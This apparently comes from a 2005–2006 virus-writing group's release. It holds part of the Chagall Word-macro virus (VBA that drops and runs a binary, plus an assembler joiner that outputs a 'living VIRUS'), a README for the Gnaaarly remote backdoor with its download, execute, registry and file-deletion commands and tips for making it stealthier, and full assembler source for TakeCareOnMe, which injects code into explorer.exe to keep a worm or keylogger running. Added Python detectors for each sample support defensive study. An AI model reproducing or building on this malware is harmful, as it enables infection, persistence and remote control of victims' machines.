31, "Open Left(Environ(""WinDir""), 3) & ""Chag32.exe"" For Binary As #1" N.InsertLines 32, "Put #1, , NExeFile" N.InsertLines 33, "Close #1" N.InsertLines 34, "Shell Left(Environ(""WinDir""), 3) & ""Chag32.exe""" N.InsertLines 35, "If Left(ActiveDocument.Name, 2) = ""Do"" And IsNumeric(Right(ActiveDocument.Name, 1)) = True Then" N.InsertLines 36, "ActiveDocument.Saved = True" N.InsertLines 37, "Else" N.InsertLines 38, "ActiveDocument.SaveAs ActiveDocument.FullName" N.InsertLines 39, "End If" N.InsertLines 40, "End Sub" Word.Quit ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; VirusSize equ 2205d ;packed with fsg! WordDropSize equ 2671d SomethinFalse equ 1313d ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" .data Win32PartName db "Chagall.exe",0 Win32PartHandle dd ? Win32PartBuffer rb VirusSize WordPartName db "Chagall.vbs", 0 WordPartHandle dd ? WordPartBuffer rb WordDropSize OutputFileName db "ReadyChagall.exe",0 OutputFileHandle dd ? BytesRead dd ? BytesWrite dd ? 
.code Joiner: ;*****read win32 and word part into buffer************ mov ebx, Win32PartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [Win32PartHandle], eax cmp ecx, SomethinFalse je CantReadWin32Part mov ebx, Win32PartHandle mov ecx, Win32PartBuffer mov edx, VirusSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWin32Part invoke CloseHandle,\ dword [Win32PartHandle] mov ebx, WordPartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [WordPartHandle], eax cmp ecx, SomethinFalse je CantReadWordPart mov ebx, WordPartHandle mov ecx, WordPartBuffer mov edx, WordDropSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWordPart invoke CloseHandle,\ dword [WordPartHandle] ;*****read win32, firstgen and word part into buffer***end****** ;*****write win32, firstgen and word part to file*************** mov ebx, OutputFileName mov ecx, GENERIC_WRITE mov edx, CREATE_ALWAYS call OpenFile_ mov dword [OutputFileHandle], eax cmp ecx, SomethinFalse je CantCreateOutputFile mov ebx, OutputFileHandle mov edx, Win32PartBuffer mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWin32Part mov ebx, OutputFileHandle mov edx, WordPartBuffer mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWordPart invoke CloseHandle,\ dword [OutputFileHandle] invoke MessageBox,\ 0,\ "OutputFile successfully written. 
Take care, now it is a living VIRUS!",\ "success - Win32/Word.Chagall is now working",\ MB_ICONINFORMATION jmp Exit ;*****write win32, firstgen and word part to file*************** ;*****error messages******************************************** CantReadWin32Part: invoke MessageBox,\ 0,\ "Cant read the Win32 part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantReadWordPart: invoke MessageBox,\ 0,\ "Cant read the Word part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantCreateOutputFile: invoke MessageBox,\ 0,\ "Cant create the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWin32Part: invoke MessageBox,\ 0,\ "Cant write the Win32 part to the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWordPart: invoke MessageBox,\ 0,\ "Cant write the Word part to the output file",\ "error",\ MB_ICONERROR ;*****error messages***end************************************** Exit: invoke ExitProcess,\ 0 ;*****Procedures Open, Read and Write files********************* OpenFile_: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. 
GENERIC_WRITE 0,\ edx,\ FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ReadInBuffer: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to buffer start ecx,\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInBufferEnd mov ecx, SomethinFalse jmp ReadBufferReturn ReadInBufferEnd: mov ecx, 0 ReadBufferReturn: ret WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle edx,\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****Procedures Open, Read and Write files***end*************** .end Joiner ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
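For defenders, the indicators visible in the Chagall.vbs listing above can be matched against macro or script source that has already been extracted from a document. The following Python is an added example, not part of the original zine; the rule names, the verdict logic and the sample macros are constructed here.

```python
import re

# Indicator rules taken from the Chagall.vbs listing. A rule fires only when
# every pattern in its list is found somewhere in the macro text.
RULES = {
    "disables_macro_protection": [r"Options\.VirusProtection\s*=\s*False"],
    "lowers_word_security_in_registry": [
        r"\\Word\\Security\\", r"\bRegWrite\b", r"\b(?:Level|AccessVBOM)\b"],
    "rewrites_vba_project": [
        r"VBProject\.VBComponents", r"\bCodeModule\b",
        r"\b(?:InsertLines|DeleteLines)\b"],
    "touches_normal_template": [r"\bNormalTemplate\b|\bNormal\.ThisDocument\b"],
    "writes_and_runs_binary": [
        r"For\s+Binary\s+As\s+#\d+", r"\bPut\s+#\d+", r"\bShell\s+\w"],
    "chagall_strings": [r"llagahc|Chag32\.exe|Chag\.wrd"],
}


def scan_macro(text):
    """Return the rules that fire on `text` and an overall verdict.

    VBA and VBScript are case-insensitive, so matching is too.
    """
    hits = [
        name for name, patterns in RULES.items()
        if all(re.search(p, text, re.IGNORECASE) for p in patterns)
    ]
    # Assumption for this example: code that edits a VBA project AND either
    # targets the Normal template or switches off macro protection is
    # treated as self-replicating; any other hit is only "suspicious".
    replicates = "rewrites_vba_project" in hits and (
        "touches_normal_template" in hits
        or "disables_macro_protection" in hits)
    if replicates:
        verdict = "self-replicating macro"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    return {"hits": hits, "verdict": verdict}


# Constructed sample: an ordinary document macro.
BENIGN_MACRO = "\n".join([
    'Sub AutoOpen()',
    '    MsgBox "Report generated " & Date',
    '    ActiveDocument.Save',
    'End Sub',
])

# Constructed sample: a handful of lines as they appear in the listing,
# used here only as inert text for the scanner.
SUSPECT_MACRO = "\n".join([
    r'Word.Options.VirusProtection = False',
    r'RegPath = "HKCU\Software\Microsoft\Office\" & Word.Application.Version & "\Word\Security\"',
    r'Shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD"',
    r'Set N = Word.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule',
    r'N.DeleteLines 1, N.CountOfLines',
    r'AExeFile = ActiveDocument.Variables("llagahc").Value',
])

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_MACRO), ("suspect", SUSPECT_MACRO)):
        print(label, scan_macro(sample))
```

The same registry values (Level and AccessVBOM under the Word Security key) are worth monitoring directly on endpoints, since the listing sets them before touching the template.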

sources

Bockdoor.Gnaaarly DiA

Bockdoor.Gnaaarly by DiA/rrlf (c) 2005
DiA_hates_machine@gmx.de - www.vx-dia.de.vu
###########################################

Disclaimer:
I am not responsible for any damage you make with this tool. Just use it to learn how winsock and all the other stuff work. Or to annoy your brother or classmate a little bit, but no destruction! Take care.

Features:
-listen to port 30687 for connections
-accept connections from computers in the network
-awaiting commands
-execute commands
-reply if it had success
-if it fails it replies with a formatted system error in your language
-close client, and server is still running
-after server is closed no commands anymore ;)

Commands:

Fun:
!msgbox 'Caption' 'Message' - shows a message box
!mouse 'disable/enable' - disables or enables mouse
!input 'disable/enable' - disables or enables keyboard and mouse
!cdrom 'open/close' - open or close cd-rom
!start 'hide/show' - hide or show windows start button
!monitor 'on/off' - turns monitor on or off
Examples:
!msgbox 'Gnaaarly Backdoor' 'A gnaaarly backdoor is running...'
!mouse 'disable'
!mouse 'enable'
!input 'disable'
!input 'enable'
!cdrom 'open'
!cdrom 'close'
!start 'hide'
!start 'show'
!monitor 'off'
!monitor 'on'

Paths:
!windowspath - returns windows directory
!systempath - returns system directory
!location - returns the location of the running server
!getdirectory - returns the current directory
!setdirectory 'Path' - set a new current directory
Examples:
!setdirectory 'C:\Windows'

Lists:
!dirlist 'Path' - list all directories in path
!filelist 'Path' - list all directories in path
Examples:
!dirlist 'D:\'
!filelist 'C:'

Files:
!copyfile 'Existing' 'New' - copy a file, do not copy if already exist
!movefile 'Existing' 'New' - move a file, do not move if already exist
!deletefile 'Existing' - deletes an existing file
Examples:
!copyfile 'C:\Windows\Notepad.exe' 'C:\Editor.exe'
!movefile 'C:\Editor.exe' 'C:\edit.exe'
!deletefile 'C:\edit.exe'

Registry:
!regwrite 'HKEY' 'Subkey' 'Name' 'Value' - write a string to the registry
!regread 'HKEY' 'Subkey' 'ValueName' - returns a string from registry
Examples:
!regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly'
!regread 'HKEY_LOCAL_MACHINE' 'SOFTWARE\Microsoft\Windows\CurrentVersion' 'ProductId'

Applications:
!execute 'Path' - executes an application
Examples:
!execute 'C:\Windows\Notepad.exe'

Internet:
!download 'URL' 'Path' - download a file from inet to local
Examples:
!download 'http://home.arcor.de/vx-dia/index.htm' 'C:\firstpage.htm'

Exit Windows:
!shutdown - shutdown windows
!reboot - reboot windows

Clipboard:
!getclipboard - returns the text in the clipboard if exist
!setclipboard 'Text' - copy a new text into clipboard
Examples:
!setclipboard 'visit www.vx-dia.de.vu !!!'

Connection:
!close

Clients:
I made 2 clients, a console based in C++ and a GUI in VB. Feel free to use both.

To Do for you:
This tool is not made to be evil. So if you want it evil you should:
-remove that start message
-remove error message
-do autostart
-make a nice icon
-add more commands ;)

Source:
Please feel free to edit this tool, show it to friends and distribute it. For thanks or fucks drop me a mail to DiA_hates_machine@gmx.de

Source Code Copyleft: DiA(c)2005 Ready Ranger Liberation Front

pS: Big greets fly out to my little beta tester, SPTH, thanx, have fun...
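The README above fixes a listening port (30687) and a plain-text command syntax, which is enough for a network-side check. The following Python is an added example, not part of the original release; it assumes one command per line, and the severity and confidence labels and the sample flows are constructed here.

```python
import re

GNAAARLY_PORT = 30687  # listening port stated in the README

# Command verbs grouped under the README's own headings.
COMMANDS = {
    "fun": {"msgbox", "mouse", "input", "cdrom", "start", "monitor"},
    "paths": {"windowspath", "systempath", "location",
              "getdirectory", "setdirectory"},
    "lists": {"dirlist", "filelist"},
    "files": {"copyfile", "movefile", "deletefile"},
    "registry": {"regwrite", "regread"},
    "applications": {"execute"},
    "internet": {"download"},
    "exit_windows": {"shutdown", "reboot"},
    "clipboard": {"getclipboard", "setclipboard"},
    "connection": {"close"},
}
# Assumption made for this example: categories that change the host or pull
# in new code are rated "high", everything else "medium".
HIGH_IMPACT = {"files", "registry", "applications", "internet", "exit_windows"}
VERB_TO_CATEGORY = {v: cat for cat, verbs in COMMANDS.items() for v in verbs}

# "!verb" followed by zero or more 'single-quoted' arguments, nothing else.
LINE_RE = re.compile(r"^!([a-z]+)((?:\s+'[^']*')*)\s*$")
ARG_RE = re.compile(r"'([^']*)'")


def classify_payload(dst_port, payload):
    """Return one alert per line of `payload` that is a known command.

    A match on the README's port is rated high confidence; the same syntax
    on another port is kept as a low-confidence alert, because a rebuilt
    server could listen elsewhere and other tools also use "!" commands.
    """
    alerts = []
    for line in payload.decode("latin-1").splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        verb = match.group(1)
        category = VERB_TO_CATEGORY.get(verb)
        if category is None:
            continue  # "!something" that the README does not list
        alerts.append({
            "verb": verb,
            "category": category,
            "args": ARG_RE.findall(match.group(2)),
            "severity": "high" if category in HIGH_IMPACT else "medium",
            "confidence": "high" if dst_port == GNAAARLY_PORT else "low",
        })
    return alerts


# Constructed sample flows: (destination port, reassembled client payload).
SAMPLE_FLOWS = [
    (30687, b"!regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly'\r\n"),
    (30687, b"!cdrom 'open'\r\n!close\r\n"),
    (80, b"GET /index.htm HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),
    (6667, b"!start 'hide'\r\n"),
    (30687, b"!unknownverb 'x'\r\n"),
]


def scan_flows(flows):
    """Flatten the alerts for a list of flows into (port, alert) pairs."""
    return [(port, alert)
            for port, payload in flows
            for alert in classify_payload(port, payload)]


if __name__ == "__main__":
    for port, alert in scan_flows(SAMPLE_FLOWS):
        print(port, alert)
```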

sources

TakeCareOnMe 1.0 DiA ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° TakeCareOnMe 1.0 by DiA/RRLF (c)2006 °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° DiA_hates_machine@gmx.de - http://www.vx-dia.vu °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° What's that? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° This is a small utility (1305 bytes compressed with FSG) wich is able to keep your application °°°°; ;°°°°° alive, can be your worm, your keylogger or the anoying program you wrote for some fucker. °°°°; ;°°°°° The program injects some code in Explorer that infinite check if your program is still running °°°°; ;°°°°° if not so, it restarts it. Only way out is to terminate Explorer process, and wich normal dude °°°°; ;°°°°° is doing this... °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° How to use it? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° Pretty easy, just call this program with full path of the program you want to stay alive. As °°°°; ;°°°°° example we want that the Calculator stays active, and restarts if it got closed, we call this °°°°; ;°°°°° program with parameter "C:\WINDOWS\System32\Calc.exe" (on normal installed XP). See syntax: °°°°; ;°°°°° %full path%\TakeCareOnMe 1.0.exe <full path of application you want to take care for> °°°°; ;°°°°° example: C:\WINDOWS\t com.exe C:\WINDOWS\System32\Calc.exe °°°°; ;°°°°° How easy huh? You just make sure that you call this program with full path, and give the full °°°°; ;°°°°° path of the application you want to stay alive. 
Thats all. °°°°; ;°°°°° I just included this tool in my worm "Tamiami" and recocnized that the parameter extraction °°°°; ;°°°°° just works when there is a space inside of the path of TakeCareOnMe. So you may want to change °°°°; ;°°°°° this in source, this is the way: °°°°; ;°°°°° No space in path => then the first space ("...exe C:\...") is the parameter begin (+1) °°°°; ;°°°°° With space in path => last " is parameter begin (+2) °°°°; ;°°°°° Just don't mind and copy this tool with a space in filename, as example name it "t com.exe". °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° Huh? How what huh?! °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° include "%fasminc%\win32ax.inc" °°°°; ;°°°°° °°°°; ;°°°°° .data °°°°; ;°°°°° Exec db "C:\MyAsm\Codes\TCOM\t com.exe C:\WINDOWS\System32\Calc.exe", 0 °°°°; ;°°°°° °°°°; ;°°°°° .code °°°°; ;°°°°° start: °°°°; ;°°°°° invoke WinExec,\ °°°°; ;°°°°° Exec,\ °°°°; ;°°°°° SW_SHOW °°°°; ;°°°°° °°°°; ;°°°°° invoke ExitProcess,\ °°°°; ;°°°°° 0 °°°°; ;°°°°° °°°°; ;°°°°° .end start °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° What else? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° As always you are responsible for your actions. °°°°; ;°°°°° Here a little idea, just write your Worm (or whatever) binary to memory too, if it got °°°°; ;°°°°° terminated AND deleted, write it back to disk and execute it again. That's all, visit °°°°; ;°°°°° http://www.vx-dia.de.vu right now! Thanx to izee for beta testing. 
°°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; include "%fasminc%\win32ax.inc" entry TakeCareOnMe ;code start macro _invoke proc,[arg] ;modified invoke macro, { common ;call with delta offset if ~ arg eq reverse pushd arg common end if call [ebp + proc] } section '.code' code readable writeable executable RemoteThreadStart: call DeltaOffset ;to get right addresses DeltaOffset: pop ebp sub ebp, DeltaOffset ;difference now in ebp CareStart: mov dword [ebp + ProcessEntry.dwSize], sizeof.PROCESSENTRY32 ;fill structure with its size lea ebx, dword [ebp + ProcessEntry] ;ebx holds address of structure _invoke _CreateToolhelp32Snapshot,\ ;snapshot of processes 2,\ ;TH32CS_SNAPPROCESS edx ;pointer to structure cmp eax, 0 ;error? je ReturnThread mov dword [ebp + SnapHandle], eax ;save handle _invoke _Process32First,\ ;find first process dword [ebp + SnapHandle],\ ebx ;ProcessEntry address cmp eax, 0 je ReturnThread NextProcess: lea eax, dword [ebp + ProcessEntry.szExeFile] lea edx, dword [ebp + CareForShort] _invoke _lstrcmpi,\ eax,\ ;is found process edx ;the process to take care for? cmp eax, 0 je CareForRuns ;if so no need to restart, sleep _invoke _Process32Next,\ ;next process dword [ebp + SnapHandle],\ ebx ;ProcessEntry cmp eax, 0 ;search all processes? 
je CareForRestart ;restart our process then lea eax, dword [ebp + NextProcess] jmp eax CareForRuns: _invoke _CloseHandle,\ dword [ebp + SnapHandle] ;close snapshot handle _invoke _Sleep,\ ;sleep 10 seconds 10000d lea eax, dword [ebp + CareStart] jmp eax CareForRestart: _invoke _CloseHandle,\ dword [ebp + SnapHandle] lea eax, dword [ebp + CareForFull] lea ebx, dword [ebp + StartupInfo] lea edx, dword [ebp + ProcessInfo] _invoke _CreateProcess,\ ;program to care for gots closed, restart eax,\ 0,\ 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ ebx,\ edx _invoke _Sleep,\ 1000d ;sleep 1 second lea eax, dword [ebp + CareStart] jmp eax ReturnThread: ret ;return remote thread RemoteDatas: CareForFull rb 256d CareForShort rb 256d ProcessEntry PROCESSENTRY32 SnapHandle dd ? StartupInfo STARTUPINFO ProcessInfo PROCESS_INFORMATION _CreateToolhelp32Snapshot dd ? _Process32First dd ? _Process32Next dd ? _lstrcmpi dd ? _CloseHandle dd ? _Sleep dd ? _CreateProcess dd ? RemoteThreadEnd: Datas: Kernel32Handle dd ? ProcessEntryOwn PROCESSENTRY32 SnapHandleOwn dd ? ProcessHandle dd ? BaseAddress dd ? APITable db "CreateToolhelp32Snapshot", 0 db "Process32First", 0 db "Process32Next", 0 db "lstrcmpiA", 0 db "CloseHandle", 0 db "Sleep", 0 db "CreateProcessA", 0, 13d TakeCareOnMe: invoke GetCommandLine inc eax ;skip " mov ecx, 0 ;counter to zero SearchOwnEnd: cmp byte [eax + ecx], '"' ;is end " je HaveOwnEnd ;counter++ inc ecx jmp SearchOwnEnd HaveOwnEnd: ;erase own name add eax, ecx ;erase "{space} add eax, 2d mov ecx, 0 ;zero counter SearchParameterEnd: cmp byte [eax + ecx], 0 ;end of string? je HaveParameterEnd inc ecx jmp SearchParameterEnd HaveParameterEnd: mov esi, eax ;source index mov edi, CareForFull ;destination rep movsb ;mov [ecx] bytes from source to destination mov ecx, 0 ;zero counter SearchShortEnd: cmp byte [eax + ecx], "." 
;search for .(exe) je SearchShortStart inc ecx jmp SearchShortEnd SearchShortStart: cmp byte [eax + ecx], "\" ;search for last "\" je HaveShortStart dec ecx ;search backwards jmp SearchShortStart HaveShortStart: add eax, ecx ;begin inc eax ;skip "\" mov ecx, 0 ;zero counter GetShortLength: cmp byte [eax + ecx], 0 ;end of string? je HaveShortLength inc ecx jmp GetShortLength HaveShortLength: mov esi, eax ;source mov edi, CareForShort ;destination rep movsb ;length copy cmp byte [CareForFull], 0 ;no parameter? je Exit ;then i have nothing to do invoke LoadLibrary,\ ;load kernel32.dll "kernel32.dll" ;to get api addresses cmp eax, 0 je Exit mov dword [Kernel32Handle], eax mov ebx, APITable ;start of api strings mov edx, _CreateToolhelp32Snapshot ;start of address storage push edx ;edx get changed while api calls NextAPI: invoke GetProcAddress,\ dword [Kernel32Handle],\ ;kernel32.dll ebx ;pointer to api string pop edx mov dword [edx], eax ;save proc address add edx, 4d ;jump to next save address (+dd) push edx mov ecx, 0 SearchNextAPI: cmp byte [ebx + ecx], 0 ;api end? je HaveNextAPI inc ecx jmp SearchNextAPI HaveNextAPI: add ebx, ecx ;end of last api inc ebx ;start of next api cmp byte [ebx], 13d ;end of api table? je HaveAllAPI jmp NextAPI HaveAllAPI: invoke FreeLibrary,\ ;oww, i have so good coding style dword [Kernel32Handle] mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32 ;set size to structure invoke _CreateToolhelp32Snapshot,\ ;why dont use it a second time? :) 2,\ ;TH32CS_SNAPPROCESS 0 cmp eax, 0 ;error? je Exit ;then we cant inject mov dword [SnapHandleOwn], eax ;save handle invoke _Process32First,\ ;again, we already have the address by GetProcAddress dword [SnapHandleOwn],\ ;but use another address of handle then in thread ProcessEntryOwn ;here too NextTargetProcess: ;check next cmp eax, 0 ;error, explorer.exe not found je Exit invoke _lstrcmpi,\ ProcessEntryOwn.szExeFile,\ ;is found process "explorer.exe" ;explorer? 
cmp eax, 0 je FoundExplorer ;if so i found explorer invoke _Process32Next,\ dword [SnapHandleOwn],\ ProcessEntryOwn jmp NextTargetProcess ;check the next process FoundExplorer: invoke _CloseHandle,\ ;close snapshot handle dword [SnapHandleOwn] invoke OpenProcess,\ ;open the explorer process PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\ ;want to operate in it, to write my thread and to execute it 0,\ dword [ProcessEntryOwn.th32ProcessID] ;the process id we got from snapshot cmp eax, 0 ;error je Exit ;**no need for VirtualProtect call, cause it would fail if we ;dont have permission to write & execute mov dword [ProcessHandle], eax ;save process handle invoke VirtualAllocEx,\ ;allocate space in the explorer process dword [ProcessHandle],\ ;i want space here 0,\ RemoteThreadEnd - RemoteThreadStart,\ ;get size of remote thread MEM_COMMIT,\ PAGE_READWRITE ;sure we want write cmp eax, 0 ;error? je Exit mov dword [BaseAddress], eax ;where is the space allocated? invoke WriteProcessMemory,\ ;write to process memore dword [ProcessHandle],\ ;to explorer dword [BaseAddress],\ ;start of buffer in memory RemoteThreadStart,\ ;start of code to write RemoteThreadEnd - RemoteThreadStart,\ ;size to write 0 cmp eax, 0 je Exit ;exit on error invoke CreateRemoteThread,\ ;now execute the written thread dword [ProcessHandle],\ ;excute in explorer context 0,\ 0,\ dword [BaseAddress],\ ;start of process in memory 0,\ ;no parameter 0,\ 0 invoke _CloseHandle,\ dword [ProcessHandle] ;close explorer handle Exit: invoke ExitProcess,\ 0 ;work done, i take care for my lil program Pose db "TakeCareOnMe 1.0 by DiA/RRLF (c)06" ;) section '.idata' data import readable library kernel32, "kernel32.dll" import kernel32,\ GetCommandLine, "GetCommandLineA",\ LoadLibrary, "LoadLibraryA",\ GetProcAddress, "GetProcAddress",\ FreeLibrary, "FreeLibrary",\ OpenProcess, "OpenProcess",\ VirtualAllocEx, "VirtualAllocEx",\ WriteProcessMemory, "WriteProcessMemory",\ CreateRemoteThread, 
"CreateRemoteThread",\ ExitProcess, "ExitProcess"
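From a detection standpoint, the listing above leaves two observable traces: a remote thread created in explorer.exe, and explorer.exe relaunching the same image within the 10-second poll interval each time that image exits. The following Python is an added example, not part of the original source; it correlates Sysmon events 8 (CreateRemoteThread), 5 (ProcessTerminate) and 1 (ProcessCreate) that are assumed to have been flattened into dicts, and the window, the threshold and the sample events are constructed here.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# The injected loop in the listing sleeps 10 s between checks; the extra
# 5 s of slack is an assumption of this example.
RESPAWN_WINDOW = timedelta(seconds=15)
# Assumption: a single relaunch from Explorer could be the user, so at
# least two quick relaunches are required before reporting.
MIN_RESPAWNS = 2


def ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def image_name(path):
    # ntpath handles Windows paths regardless of the analyst's platform.
    return ntpath.basename(path).lower()


def find_watchdog_respawns(events):
    """Report images that an injected explorer.exe keeps restarting."""
    injected = {}                # explorer pid -> image that created the thread
    last_exit = {}               # image name -> time of its latest exit
    respawns = defaultdict(int)  # (explorer pid, image name) -> relaunch count
    for e in sorted(events, key=ts):
        when = ts(e)
        if e["EventID"] == 8 and image_name(e["TargetImage"]) == "explorer.exe":
            injected.setdefault(e["TargetProcessId"], e["SourceImage"])
        elif e["EventID"] == 5:
            last_exit[image_name(e["Image"])] = when
        elif e["EventID"] == 1:
            parent, img = e["ParentProcessId"], image_name(e["Image"])
            exited = last_exit.pop(img, None)
            if (parent in injected and exited is not None
                    and when - exited <= RESPAWN_WINDOW):
                respawns[(parent, img)] += 1
    return [
        {"explorer_pid": pid, "injector": injected[pid],
         "image": img, "respawns": count}
        for (pid, img), count in sorted(respawns.items())
        if count >= MIN_RESPAWNS
    ]


# Constructed sample events (field names follow Sysmon's EventData names;
# paths, PIDs and times are made up for the example).
EXPLORER = r"C:\Windows\explorer.exe"
CALC = r"C:\Windows\System32\calc.exe"
NOTEPAD = r"C:\Windows\System32\notepad.exe"
DAY = "2024-05-01 "
SAMPLE_EVENTS = [
    {"EventID": 8, "UtcTime": DAY + "09:00:00.000",
     "SourceImage": r"C:\Temp\sample.exe",
     "TargetImage": EXPLORER, "TargetProcessId": 1200},
    {"EventID": 5, "UtcTime": DAY + "09:05:00.000", "Image": CALC, "ProcessId": 3000},
    {"EventID": 1, "UtcTime": DAY + "09:05:07.000", "Image": CALC, "ProcessId": 3010,
     "ParentImage": EXPLORER, "ParentProcessId": 1200},
    {"EventID": 5, "UtcTime": DAY + "09:06:00.000", "Image": CALC, "ProcessId": 3010},
    {"EventID": 1, "UtcTime": DAY + "09:06:04.000", "Image": CALC, "ProcessId": 3020,
     "ParentImage": EXPLORER, "ParentProcessId": 1200},
    # A user reopening Notepad twenty minutes after closing it: not a respawn.
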